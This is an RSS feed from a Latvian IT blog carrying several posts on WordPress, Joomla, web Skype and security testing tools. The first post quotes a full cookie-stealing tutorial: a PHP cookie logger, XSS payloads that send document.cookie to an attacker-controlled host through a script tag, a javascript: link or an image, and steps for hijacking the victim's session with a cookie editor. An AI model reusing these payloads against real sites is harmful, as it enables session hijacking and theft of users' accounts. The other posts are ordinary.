<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>IT sviestapika &#187; Web</title>
	<atom:link href="http://dll.lv/category/web/feed" rel="self" type="application/rss+xml" />
	<link>http://dll.lv</link>
	<description>Par IT un ne tikai</description>
	<lastBuildDate>Sun, 29 Jan 2012 13:55:30 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Kā nodemonstrēt XSS ievainojamību</title>
		<link>http://dll.lv/ka-nodemonstret-xss-ievainojamibu?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=ka-nodemonstret-xss-ievainojamibu</link>
		<comments>http://dll.lv/ka-nodemonstret-xss-ievainojamibu#comments</comments>
		<pubDate>Sat, 21 Jan 2012 16:02:35 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Apmācība]]></category>
		<category><![CDATA[Drošība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Javascript]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1804</guid>
		<description><![CDATA[Ja ir nepieciešams nodemonstrēt kādā veidā var izmantot XSS ievainojamību kādā mājas lapā, tad var izmantot autora izveidoto php skriptu, lai nebūtu jāizveido divritenis no sākuma. Otrs veids ir izmantot šo pieeju. Savkārt ievietot jau mājaslapā pārsūtāmo informāciju visbiežāk izdevies &#8230; <a href="http://dll.lv/ka-nodemonstret-xss-ievainojamibu">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/www-zz-lv-un-xss' rel='bookmark' title='www.zz.lv un XSS'>www.zz.lv un XSS</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/lapas-redirect' rel='bookmark' title='Lapas redirect'>Lapas redirect</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Ja ir nepieciešams nodemonstrēt kādā veidā var izmantot XSS ievainojamību kādā mājas lapā, tad var izmantot <a href="http://hackiteasy.blogspot.com/2011/01/session-hijacking-or-cookie-stealing.html">autora</a> izveidoto php skriptu, lai nebūtu jāizveido divritenis no sākuma.</p>
<p>Otrs veids ir izmantot <a href="http://www.criticalsecurity.net/index.php/topic/7137-how-to-make-a-cookie-stealer/">šo</a> pieeju.<br />
<span id="more-1804"></span><br />
Savkārt ievietot jau mājaslapā pārsūtāmo informāciju visbiežāk izdevies izmantojot <a href="http://jehiah.cz/a/xss-stealing-cookies-101">šo</a> piemēru:</p>
<p>&lt;p&gt;script><br />
new Image().src=&#8221;http://jehiah.com/_sandbox/log.cgi?c=&#8221;+encodeURI(document.cookie);<br />
&lt;p&gt;/script></p>
<blockquote><p>In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim&#8217;s computer (see HTTP cookie theft).</p>
<p>Here we show how you can hack a session using javascript and php.</p>
<p>What is a cookie?</p>
<p>A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.<br />
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.<br />
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.</p>
<p>What can we do after stealing cookie?</p>
<p>Well,as we know web sites authenticate their user&#8217;s with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.</p>
<p>This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.</p>
<p>PHP Code:<br />
<!--?php function GetIP() { if (getenv("HTTP_CLIENT_IP") &#038;&#038; strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") &#038;&#038; strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") &#038;&#038; strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) &#038;&#038; $_SERVER['REMOTE_ADDR'] &#038;&#038; strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } function logData() { $ipLog="log.txt"; $cookie = $_SERVER['QUERY_STRING']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) $ip = getenv('REMOTE_ADDR'); else $ip = GetIP(); $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie "); else fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); fclose($log); } logData(); ?--></p>
<p>Save the script as a cookielogger.php on your server.<br />
(You can get any free webhosting easily such as justfree,x10hosting etc..)</p>
<p>Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.</p>
<p>Now for the hack to work we have to inject this piece of javascript into the target&#8217;s page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.</p>
<p>The best way is to look for user interactive sites which contain comments or forums.</p>
<p>Post the following code which invokes or activates the cookielogger on your host.</p>
<p>Code:<br />
&lt;p&gt;script type=&#8221;text/javascript&#8221; language=&#8221;Java script&#8221;>// <![CDATA[<br />
document.location="http://www.yourhost.com/cookielogger.php?cookie=&quot; + document.cookie;<br />
// ]]&gt;&lt;p&gt;/script></p>
<p>Your can also trick the victim into clicking a link that activates javascript.<br />
Below is the code which has to be posted.</p>
<p>Code:<br />
&lt;p&gt;a href=&#8221;java script:document.location=&#8217;http://www.yourhost.com/cookielogger.php?cookie=&#8217;+document.cookie;&#8221;>Click here!</a></p>
<p>Clicking an image also can activate the script.For this purpose you can use the below code.</p>
<p>Code:</p>
<p>&lt;p&gt;img src=&#8221;URL OF THE IMAGE&#8221; alt=&#8221;" /></p>
<p>All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver</p>
<p>In the above codes please remove the space in between javascript.</p>
<p>Hijacking the Session:</p>
<p>Now we have cookie,what to do with this..?<br />
Download cookie editor mozilla plugin or you may find other plugins as well.</p>
<p>Go to the target site&#8211;&gt;open cookie editor&#8211;&gt;Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573</p>
<p>Don&#8217;t forget to comment if you like my post.<br />
by hackiteasy</p></blockquote>
<p>Related posts:<ol>
<li><a href='http://dll.lv/www-zz-lv-un-xss' rel='bookmark' title='www.zz.lv un XSS'>www.zz.lv un XSS</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/lapas-redirect' rel='bookmark' title='Lapas redirect'>Lapas redirect</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/ka-nodemonstret-xss-ievainojamibu/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Iznācis wordpress 3.3</title>
		<link>http://dll.lv/iznacis-wordpress-3-3?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=iznacis-wordpress-3-3</link>
		<comments>http://dll.lv/iznacis-wordpress-3-3#comments</comments>
		<pubDate>Sun, 01 Jan 2012 12:28:27 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1783</guid>
		<description><![CDATA[WordPress nebeidz pārsteigt un ar pilno jauno iespēju sarakstu var iepazīties te. Mana līdzšenējā tēma gan atteicās sadarboties ar 3.3, bet ar to ir jārēķinās veicot atjaunināšanu. Related posts: Iznācis WordPress 3.0.5 ar drošības labojumiem WordPress update crash Atjaunojam wordpress
Related posts:<ol>
<li><a href='http://dll.lv/iznacis-wordpress-3-0-5-ar-drosibas-labojumiem' rel='bookmark' title='Iznācis WordPress 3.0.5 ar drošības labojumiem'>Iznācis WordPress 3.0.5 ar drošības labojumiem</a></li>
<li><a href='http://dll.lv/wordpress-update-crash' rel='bookmark' title='WordPress update crash'>WordPress update crash</a></li>
<li><a href='http://dll.lv/atjaunojam-wordpress' rel='bookmark' title='Atjaunojam wordpress'>Atjaunojam wordpress</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>WordPress nebeidz pārsteigt un ar pilno jauno iespēju sarakstu var iepazīties <a href="http://codex.wordpress.org/Version_3.3">te</a>.<br />
Mana līdzšenējā tēma gan atteicās sadarboties ar 3.3, bet ar to ir jārēķinās veicot atjaunināšanu.</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/iznacis-wordpress-3-0-5-ar-drosibas-labojumiem' rel='bookmark' title='Iznācis WordPress 3.0.5 ar drošības labojumiem'>Iznācis WordPress 3.0.5 ar drošības labojumiem</a></li>
<li><a href='http://dll.lv/wordpress-update-crash' rel='bookmark' title='WordPress update crash'>WordPress update crash</a></li>
<li><a href='http://dll.lv/atjaunojam-wordpress' rel='bookmark' title='Atjaunojam wordpress'>Atjaunojam wordpress</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/iznacis-wordpress-3-3/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Joomla maina izstrādes stratēģiju.</title>
		<link>http://dll.lv/joomla-maina-izstrades-strategiju?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=joomla-maina-izstrades-strategiju</link>
		<comments>http://dll.lv/joomla-maina-izstrades-strategiju#comments</comments>
		<pubDate>Sun, 28 Aug 2011 07:18:25 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Joomla]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1705</guid>
		<description><![CDATA[Joomla ir izmainījusi savu izstrādes stratēģiju no iespēju (fīču) balstītu uz izstrādes laika balstītu. Savas priekšrocības ir abām pieejām un izskatās, ka viņiem bija pēdējais laiks kaut ko mainīt. Kādreiz bija &#8211; iznāk jauna versija un ir daudz uzlabojumu. Tagad &#8230; <a href="http://dll.lv/joomla-maina-izstrades-strategiju">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/joomla-1-6' rel='bookmark' title='Joomla 1.6'>Joomla 1.6</a></li>
<li><a href='http://dll.lv/pods-izsmiets-vai-vesture-atkartojas' rel='bookmark' title='Pods izsmiets vai vēsture atkārtojas'>Pods izsmiets vai vēsture atkārtojas</a></li>
<li><a href='http://dll.lv/drupal-stress-test' rel='bookmark' title='Drupal stress test'>Drupal stress test</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Joomla ir izmainījusi savu izstrādes stratēģiju no iespēju (fīču) balstītu uz izstrādes laika balstītu.<br />
Savas priekšrocības ir abām pieejām un izskatās, ka viņiem bija pēdējais laiks kaut ko mainīt.<br />
Kādreiz bija &#8211; iznāk jauna versija un ir daudz uzlabojumu. Tagad būs biežāki, bet mazāki uzlabojumi.<br />
Par to var palasīt <a href="http://magazine.joomla.org/issues/Issue-Aug-2011/item/538-Infographic-Joomla-CMS-Development-Strategy" target="_blank">te</a> un noskatīties video <a href="http://magazine.joomla.org/issues/Issue-Aug-2011/item/544-The-Joomla-Version-Strategy-Explained" target="_blank">te</a>.</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/joomla-1-6' rel='bookmark' title='Joomla 1.6'>Joomla 1.6</a></li>
<li><a href='http://dll.lv/pods-izsmiets-vai-vesture-atkartojas' rel='bookmark' title='Pods izsmiets vai vēsture atkārtojas'>Pods izsmiets vai vēsture atkārtojas</a></li>
<li><a href='http://dll.lv/drupal-stress-test' rel='bookmark' title='Drupal stress test'>Drupal stress test</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/joomla-maina-izstrades-strategiju/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WEB skype beidzot pieejams grupu čats</title>
		<link>http://dll.lv/web-skype-beidzot-pieejams-grupu-cats?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=web-skype-beidzot-pieejams-grupu-cats</link>
		<comments>http://dll.lv/web-skype-beidzot-pieejams-grupu-cats#comments</comments>
		<pubDate>Fri, 01 Jul 2011 07:02:27 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[imo.im]]></category>
		<category><![CDATA[skype]]></category>
		<category><![CDATA[web skype]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1651</guid>
		<description><![CDATA[Diezgan sen sekoju projekta https://imo.im attīstībai. Projekts laika gaitā ir baigi modernizējies un šodien pamanīju, ka novērsuši lielāko mīnusu- nebija pieejams grupu čats. Projekta izmaiņas, kopš to lietoju: Parādījās sarakstes vēsture Profila bildes Grupu čats Kāda vēl fīča tiks iestrādāta &#8230; <a href="http://dll.lv/web-skype-beidzot-pieejams-grupu-cats">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/nelielas-pardomas-par-skype' rel='bookmark' title='Nelielas pārdomas par skype'>Nelielas pārdomas par skype</a></li>
<li><a href='http://dll.lv/testesanas-riki' rel='bookmark' title='WEB testēšanas rīki'>WEB testēšanas rīki</a></li>
<li><a href='http://dll.lv/kad-beidzot-bios-tiks-aizstats-ar-uefi' rel='bookmark' title='Kad beidzot BIOS tiks aizstāts ar UEFI?'>Kad beidzot BIOS tiks aizstāts ar UEFI?</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Diezgan sen sekoju projekta <a href="https://imo.im" target="_blank">https://imo.im</a> attīstībai.<br />
Projekts laika gaitā ir baigi modernizējies un šodien pamanīju, ka novērsuši lielāko mīnusu- nebija pieejams grupu čats.<br />
Projekta izmaiņas, kopš to lietoju:</p>
<ul>
<li>Parādījās sarakstes vēsture</li>
<li>Profila bildes</li>
<li>Grupu čats</li>
</ul>
<p>Kāda vēl fīča tiks iestrādāta web skype?</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/nelielas-pardomas-par-skype' rel='bookmark' title='Nelielas pārdomas par skype'>Nelielas pārdomas par skype</a></li>
<li><a href='http://dll.lv/testesanas-riki' rel='bookmark' title='WEB testēšanas rīki'>WEB testēšanas rīki</a></li>
<li><a href='http://dll.lv/kad-beidzot-bios-tiks-aizstats-ar-uefi' rel='bookmark' title='Kad beidzot BIOS tiks aizstāts ar UEFI?'>Kad beidzot BIOS tiks aizstāts ar UEFI?</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/web-skype-beidzot-pieejams-grupu-cats/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress update crash</title>
		<link>http://dll.lv/wordpress-update-crash?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=wordpress-update-crash</link>
		<comments>http://dll.lv/wordpress-update-crash#comments</comments>
		<pubDate>Sun, 26 Jun 2011 19:16:41 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[auto update]]></category>
		<category><![CDATA[paplašinam wordpress]]></category>
		<category><![CDATA[update]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[wordpress update]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1631</guid>
		<description><![CDATA[Problēma: Atjaunojot wordpress izmantojot automātisko atjaunināšanas iespēju tas regulāri beidzass ar kļūdu. Šo problēmu atrisina plugins ftp-upgrade-fix.1.0 Related posts: Atjaunojam wordpress Draugiem.lv pase priekš wordpress Paplašinām wordpress iespējas
Related posts:<ol>
<li><a href='http://dll.lv/atjaunojam-wordpress' rel='bookmark' title='Atjaunojam wordpress'>Atjaunojam wordpress</a></li>
<li><a href='http://dll.lv/draugiem-lv-pase-prieks-wordpress' rel='bookmark' title='Draugiem.lv pase priekš wordpress'>Draugiem.lv pase priekš wordpress</a></li>
<li><a href='http://dll.lv/paplasinam-wordpress-iespejas' rel='bookmark' title='Paplašinām wordpress iespējas'>Paplašinām wordpress iespējas</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Problēma:<br />
Atjaunojot wordpress izmantojot automātisko atjaunināšanas iespēju tas regulāri beidzass ar kļūdu.<br />
Šo problēmu atrisina plugins <a href="http://wordpress.org/extend/plugins/ftp-upgrade-fix/">ftp-upgrade-fix.1.0</a></p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/atjaunojam-wordpress' rel='bookmark' title='Atjaunojam wordpress'>Atjaunojam wordpress</a></li>
<li><a href='http://dll.lv/draugiem-lv-pase-prieks-wordpress' rel='bookmark' title='Draugiem.lv pase priekš wordpress'>Draugiem.lv pase priekš wordpress</a></li>
<li><a href='http://dll.lv/paplasinam-wordpress-iespejas' rel='bookmark' title='Paplašinām wordpress iespējas'>Paplašinām wordpress iespējas</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/wordpress-update-crash/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WEB testēšanas rīki</title>
		<link>http://dll.lv/testesanas-riki?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=testesanas-riki</link>
		<comments>http://dll.lv/testesanas-riki#comments</comments>
		<pubDate>Sun, 20 Mar 2011 12:11:39 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Apmācība]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[DirBuster]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[GrendelScan]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[Nikito2]]></category>
		<category><![CDATA[Tamper Data]]></category>
		<category><![CDATA[tests]]></category>
		<category><![CDATA[w3af]]></category>
		<category><![CDATA[Wapiti]]></category>
		<category><![CDATA[WebScarab]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1497</guid>
		<description><![CDATA[Galvenie testēšanas rīki, kurus izmantot WEB aplikāciju testēšanā (šos rīkus vajag lietot ar prātu, jo tie var radīt lielu noslodzi): Web application vulnerability scanner- Wapiti Web Application Attack and Audit Framework W3af Web server scanner Nikto2 Brute force directories and &#8230; <a href="http://dll.lv/testesanas-riki">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/uznemuma-informacijas-aizsardziba-vai-ka-izsargaties-no-datu-nopludes' rel='bookmark' title='Uzņēmuma informācijas aizsardzība vai kā izsargāties no datu noplūdes'>Uzņēmuma informācijas aizsardzība vai kā izsargāties no datu noplūdes</a></li>
<li><a href='http://dll.lv/second-step-in-forensic-investigation-vai-hackeri-uzbruk-2' rel='bookmark' title='Second step in forensic investigation vai hackeri uzbrūk 2'>Second step in forensic investigation vai hackeri uzbrūk 2</a></li>
<li><a href='http://dll.lv/drupal-stress-test' rel='bookmark' title='Drupal stress test'>Drupal stress test</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Galvenie testēšanas rīki, kurus izmantot WEB aplikāciju testēšanā (šos rīkus vajag lietot ar prātu, jo tie var radīt lielu noslodzi):</p>
<p>Web application vulnerability scanner- <a href="http://wapiti.sourceforge.net/">Wapiti</a><br />
Web Application Attack and Audit Framework <a href="http://w3af.sourceforge.net/">W3af</a><br />
Web server scanner <a href="http://cirt.net/nikto2">Nikto2</a><br />
Brute force directories and files names on web/application servers <a href="http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project">DirBuster</a><br />
WEB proxy <a href="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project">WebScarab</a><br />
Web application security testing tool <a href="http://www.grendel-scan.com/">Grendel-Scan</a><br />
<a href="https://addons.mozilla.org/en-us/firefox/addon/tamper-data/">Tamper Data</a>- ļauj mainīt sūtāmo parametru vērtības<br />
<a href="http://www.metasploit.com/">Metasploit</a> penetration testing framework</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/uznemuma-informacijas-aizsardziba-vai-ka-izsargaties-no-datu-nopludes' rel='bookmark' title='Uzņēmuma informācijas aizsardzība vai kā izsargāties no datu noplūdes'>Uzņēmuma informācijas aizsardzība vai kā izsargāties no datu noplūdes</a></li>
<li><a href='http://dll.lv/second-step-in-forensic-investigation-vai-hackeri-uzbruk-2' rel='bookmark' title='Second step in forensic investigation vai hackeri uzbrūk 2'>Second step in forensic investigation vai hackeri uzbrūk 2</a></li>
<li><a href='http://dll.lv/drupal-stress-test' rel='bookmark' title='Drupal stress test'>Drupal stress test</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/testesanas-riki/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Kapitals.lv</title>
		<link>http://dll.lv/kapitals-lv-2?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=kapitals-lv-2</link>
		<comments>http://dll.lv/kapitals-lv-2#comments</comments>
		<pubDate>Sat, 19 Feb 2011 19:21:26 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[apstrādes kļūda]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[kapitals.lv]]></category>
		<category><![CDATA[pieredze]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1523</guid>
		<description><![CDATA[Šodien kapitals.lv mājas lapa satura vietā izvada datubāzes kļūdu. Šāda lieta viņiem jau gadījās ātrāk. Related posts: Kapitals.lv Uzlauzts Chrysler.lv www.atlaizuklubs.lv SQL kļūda
Related posts:<ol>
<li><a href='http://dll.lv/kapitals-lv' rel='bookmark' title='Kapitals.lv'>Kapitals.lv</a></li>
<li><a href='http://dll.lv/uzlauzts-chrysler-lv' rel='bookmark' title='Uzlauzts Chrysler.lv'>Uzlauzts Chrysler.lv</a></li>
<li><a href='http://dll.lv/www-atlaizuklubs-lv-sql-kluda' rel='bookmark' title='www.atlaizuklubs.lv SQL kļūda'>www.atlaizuklubs.lv SQL kļūda</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Šodien <a href="http://kapitals.lv">kapitals.lv</a> mājas lapa satura vietā izvada datubāzes kļūdu. Šāda lieta viņiem jau gadījās <a href="http://dll.lv/kapitals-lv">ātrāk</a>.<br />
<a href="http://dll.lv/wp-content/uploads/2011/02/kapitals.png"><img src="http://dll.lv/wp-content/uploads/2011/02/kapitals-300x168.png" alt="" title="kapitals" width="300" height="168" class="aligncenter size-medium wp-image-1524" /></a></p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/kapitals-lv' rel='bookmark' title='Kapitals.lv'>Kapitals.lv</a></li>
<li><a href='http://dll.lv/uzlauzts-chrysler-lv' rel='bookmark' title='Uzlauzts Chrysler.lv'>Uzlauzts Chrysler.lv</a></li>
<li><a href='http://dll.lv/www-atlaizuklubs-lv-sql-kluda' rel='bookmark' title='www.atlaizuklubs.lv SQL kļūda'>www.atlaizuklubs.lv SQL kļūda</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/kapitals-lv-2/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Iznācis WordPress 3.0.5 ar drošības labojumiem</title>
		<link>http://dll.lv/iznacis-wordpress-3-0-5-ar-drosibas-labojumiem?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=iznacis-wordpress-3-0-5-ar-drosibas-labojumiem</link>
		<comments>http://dll.lv/iznacis-wordpress-3-0-5-ar-drosibas-labojumiem#comments</comments>
		<pubDate>Thu, 10 Feb 2011 08:11:53 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Kopums]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1520</guid>
		<description><![CDATA[Iznākusi WordPress drošības labojumu versija 3.0.5. Apraksts pieejams šeit. Related posts: Atbrīvojamies no komentāru spama Aizstājam vai izmainām izvadāmo kodu izmantojot javascript Atjaunojam wordpress
Related posts:<ol>
<li><a href='http://dll.lv/atbrivojamies-no-komentaru-spama' rel='bookmark' title='Atbrīvojamies no komentāru spama'>Atbrīvojamies no komentāru spama</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/atjaunojam-wordpress' rel='bookmark' title='Atjaunojam wordpress'>Atjaunojam wordpress</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Iznākusi WordPress drošības labojumu versija 3.0.5.<br />
Apraksts pieejams <a href="http://wordpress.org/news/2011/02/wordpress-3-0-5/">šeit.</a></p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/atbrivojamies-no-komentaru-spama' rel='bookmark' title='Atbrīvojamies no komentāru spama'>Atbrīvojamies no komentāru spama</a></li>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/atjaunojam-wordpress' rel='bookmark' title='Atjaunojam wordpress'>Atjaunojam wordpress</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/iznacis-wordpress-3-0-5-ar-drosibas-labojumiem/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>User friendly url</title>
		<link>http://dll.lv/user-friendly-url?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=user-friendly-url</link>
		<comments>http://dll.lv/user-friendly-url#comments</comments>
		<pubDate>Mon, 07 Feb 2011 09:41:42 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[User friendly url]]></category>
		<category><![CDATA[web izstrāde]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=1504</guid>
		<description><![CDATA[Ir elegants veids kā izveidot lietotājam draudzīgu url pat gadījumā, ja mājas lapas CRM to nepieļauj un nav iespējams veikt izmaiņas servera konfigurācijā (uzstādīt server side redirection ar .htaccess vai .config). Piemēram, ja ir lapa, kura neuztur lietotājam draudzīgus url- &#8230; <a href="http://dll.lv/user-friendly-url">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/html-redirect' rel='bookmark' title='HTML REDIRECT SEO'>HTML REDIRECT SEO</a></li>
<li><a href='http://dll.lv/lapas-redirect' rel='bookmark' title='Lapas redirect'>Lapas redirect</a></li>
</ol>]]></description>
